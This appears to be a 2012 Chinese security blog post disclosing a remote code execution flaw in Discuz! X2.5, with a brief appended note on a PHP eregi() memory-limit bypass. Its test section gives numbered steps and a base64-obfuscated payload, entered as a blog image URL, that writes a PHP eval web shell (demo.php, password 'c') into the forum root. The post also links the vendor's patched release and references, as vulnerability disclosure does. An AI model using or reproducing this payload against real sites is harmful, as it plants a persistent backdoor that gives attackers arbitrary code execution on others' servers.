Skip to content


Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]

发布时间: 2012-04-27
漏洞版本:Discuz! X2.5Release20120407
漏洞描述:
Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,在实现上存在远程命令执行漏洞, 远程攻击者可利用此漏洞执行远程任意代码。要成功利用此漏洞需要目标启用seo功能。

测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1,注册任意账户
2,登陆用户,发表blog日志(注意是日志)
3,添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4,访问日志,论坛根目录下生成demo.php,一句话密码C

Discuz已经发布了新版Discuz! X2.5 R20120427
http://www.discuz.net/thread-2744369-1-1.html

参考
http://sebug.net/vuldb/ssvid-60082
http://www.wooyun.org/bugs/wooyun-2012-06420
http://yaonie.org/archives/165

补充:PHP 5.4/5.3弃用eregi()函数内存限制绕过漏洞
危害
远程攻击者可以利用漏洞耗尽系统内存。

攻击所需条件
攻击者必须访问PHP应用。

漏洞信息
PHP 5.3之后弃用了基于POSIX规则表达式的函数如eregi,但在5.4.0版本中仍然使用这些函数,可被利用绕过memory_limit,通过eregi()耗尽内存。

测试方法
http://cxsecurity.com/issue/WLB-2012030271
漏洞消息链接
http://marc.info/?l=bugtraq&m=133311683110469&w=2

漏洞消息标题
PHP 5.4/5.3 deprecated eregi() memory_limit bypass

Posted in Discuz/Uchome/Ucenter, 安全通告.

Tagged with , , .


No Responses (yet)

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.



Some HTML is OK

or, reply to this post via trackback.